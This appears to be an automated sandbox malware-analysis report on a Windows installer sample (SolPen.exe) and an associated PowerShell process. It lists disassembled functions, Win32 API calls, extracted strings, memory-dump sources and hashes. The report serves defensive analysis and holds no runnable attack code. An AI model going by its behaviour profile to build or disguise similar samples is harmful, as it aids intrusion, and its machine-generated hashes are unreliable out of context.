Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x7c0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFE7DF27438 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

, xrefs: 00007FFE7DF2745D

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: dc9d6c6352bdfe569145d18534b2adbbe8a19b05a9e475f09a787554946e6885
Instruction ID: 0409c33fe7337b42628195aec9b5ab8f69de7f94ad470f13c5ea13643d9b96ea
Opcode Fuzzy Hash: dc9d6c6352bdfe569145d18534b2adbbe8a19b05a9e475f09a787554946e6885
Instruction Fuzzy Hash: 8351263171C9588FE778EA1CE444A79BBD1EF98311F1402BAE4EDC3276D925EC828781

Function 00007FFE7DF26898 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c81e2002c34c67de94dd663185121b865329f400d71291a609770668112caab
Instruction ID: 28c58cf4df3cbd5ac03d266c512efa29a8f2497af75d56fbb57d7d3896e6993a
Opcode Fuzzy Hash: 5c81e2002c34c67de94dd663185121b865329f400d71291a609770668112caab
Instruction Fuzzy Hash: EDC1C834604A8DCFDB94EF1CC898EA937E1FF69311B0505A9E86ACB261DA35EC51CF00

Function 00007FFE7DF28CCE Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f330f3d3909fc5576a3b0129251b2b239632bc8f15604e61af50cb061dfbc9
Instruction ID: 5dd370338eecbbb78d3362b680ba361d8bca6f27222fd96671c8986485c8a355
Opcode Fuzzy Hash: 25f330f3d3909fc5576a3b0129251b2b239632bc8f15604e61af50cb061dfbc9
Instruction Fuzzy Hash: A5915C31A189598FDB99EF1CC494BA977E2FF58304F1402A9E45ED72A2DE35EC41CB80

Function 00007FFE7DF2764B Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99986d693d239f3fa0bd9ec92747827a71c9a506f6ab28beae4a75a175102533
Instruction ID: 7908b6531c0c5288f24e3ec0d5270ea443b0c68fa883a9a4fa92bd12fd49d47c
Opcode Fuzzy Hash: 99986d693d239f3fa0bd9ec92747827a71c9a506f6ab28beae4a75a175102533
Instruction Fuzzy Hash: BB41A431619D894FD7A5EF2CD458A997BF1FF4831170501BAE499CB272EE24EC81C781

Function 00007FFE7DF2859F Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f8fac094cd284554db1f704d2227a835c3701374915881ffe70dec6b73ac25
Instruction ID: 629533579a0fd7f1e8431147fe377273d53df120ab3c2cfec6025955932566f4
Opcode Fuzzy Hash: 91f8fac094cd284554db1f704d2227a835c3701374915881ffe70dec6b73ac25
Instruction Fuzzy Hash: 3831F63161D5884FDB59EB28C85AAB97BE1EF85310F0401FBD44EC75A3DE24AC06C741

Function 00007FFE7DF2703D Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de44a02fae420d16155bcf40b3fdf3c0ea77d66fd1ddb617a1b237952403a127
Instruction ID: d3e3825d31d36c5ceafa0f0af4c9ed9eae3bcf8014c222dfbed5b67ad62f7d19
Opcode Fuzzy Hash: de44a02fae420d16155bcf40b3fdf3c0ea77d66fd1ddb617a1b237952403a127
Instruction Fuzzy Hash: 08313231914A598FDFA4EB59C0449BAB3F2FF58310B104679D0AAD76B1EB34B885CB40

Function 00007FFE7DF29501 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d50e6a317174eff6ebcb3b9efaa48dc793ac26a7db88bb238b50793d53be8a8
Instruction ID: a590d837d4d06879c73a82664e67ff4ff0b9e8a35bac2cac515547abcc853606
Opcode Fuzzy Hash: 8d50e6a317174eff6ebcb3b9efaa48dc793ac26a7db88bb238b50793d53be8a8
Instruction Fuzzy Hash: 5421C031668E888FC7A8EB2CC48596577E2FF5831534506BED08AC7A62DA24FC41C740

Function 00007FFE7DF275E5 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ab3e7d8aba0831a380971c6fac6d266992e9d1e47d73e059c6dd5d7bff3429
Instruction ID: 9408484da1c290d7ac070875a971e03fb77ece677ffee60d7ee07e123c25f31c
Opcode Fuzzy Hash: 82ab3e7d8aba0831a380971c6fac6d266992e9d1e47d73e059c6dd5d7bff3429
Instruction Fuzzy Hash: 9901A71271DBCA0FE7799A7D58A62367FD0DF5A21570901BFD4D8C31A2FD45AC058381

Function 00007FFE7DF23885 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 85fac1a3978a00bb52d23e7f82a7b1a4c54d2726179c0701f3b5139c0b39c00e
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: DD01A77111CB0C8FD748EF0CE051AA9B7E0FB85320F10052EE58AC3661D632E881CB41

Function 00007FFE7DF262B6 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939b86b2767b53717aa07f291944788b892a3b6dd8f28157cc8a4ca432b6957e
Instruction ID: 4d5151429346493b6fb8ed6bbbdc9eb927a975167cbd75e457d65ec7ce7b8ead
Opcode Fuzzy Hash: 939b86b2767b53717aa07f291944788b892a3b6dd8f28157cc8a4ca432b6957e
Instruction Fuzzy Hash: 3BD09E65B287984755586B5D141217D76D2FB89A08B54023EA05E93382DE2468838587

Non-executed Functions

Function 00007FFE7DF288FA Relevance: 10.1, Strings: 8, Instructions: 97COMMON

Download Yara Rule

Strings

N_^U, xrefs: 00007FFE7DF28972
N_^T, xrefs: 00007FFE7DF2896A
N_^a, xrefs: 00007FFE7DF289C2
N_^F, xrefs: 00007FFE7DF2892A
N_^b, xrefs: 00007FFE7DF289C9
N_^V, xrefs: 00007FFE7DF2897A
N_^>, xrefs: 00007FFE7DF288FA
N_^Y, xrefs: 00007FFE7DF28992

Memory Dump Source

Source File: 00000000.00000002.1484681796.00007FFE7DF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df20000_powershell.jbxd

Similarity

API ID:
String ID: N_^>$N_^F$N_^T$N_^U$N_^V$N_^Y$N_^a$N_^b
API String ID: 0-4258662478
Opcode ID: e3496cedc5422fc7e321ecf392a01c327eb3fcb305e723844b0548bbd6638a32
Instruction ID: a4248afe0c7122d1d1a74e5b826342f76577baa6a16ea64231be81eff156cf24
Opcode Fuzzy Hash: e3496cedc5422fc7e321ecf392a01c327eb3fcb305e723844b0548bbd6638a32
Instruction Fuzzy Hash: 552103B3A1852517D72176ADBCA21E93784EF9437570806B3C36CDA147ED24644786C2

Analysis Process: SolPen.exePID: 8040, Parent PID: 7780COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7
{, xrefs: 00405352

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NCRC, xrefs: 0040397C
\Temp, xrefs: 00403A1B
NSIS Error, xrefs: 004038E2
1C, xrefs: 00403B56
SeShutdownPrivilege, xrefs: 00403C16
/D=, xrefs: 004039A6
Error launching installer, xrefs: 00403A7D
~nsu.tmp, xrefs: 00403AF7
_?=, xrefs: 00403A64

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
detailprint: %s, xrefs: 00401679
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" (%d), xrefs: 004017BF
Rename failed: %s, xrefs: 0040194B
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Call: %d, xrefs: 0040165A
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Aborting: "%s", xrefs: 0040161D
Rename on reboot: %s, xrefs: 00401943
Rename: %s, xrefs: 004018F8
BringToFront, xrefs: 004016BD
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: "%s" created, xrefs: 00401849
Sleep(%d), xrefs: 0040169D

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
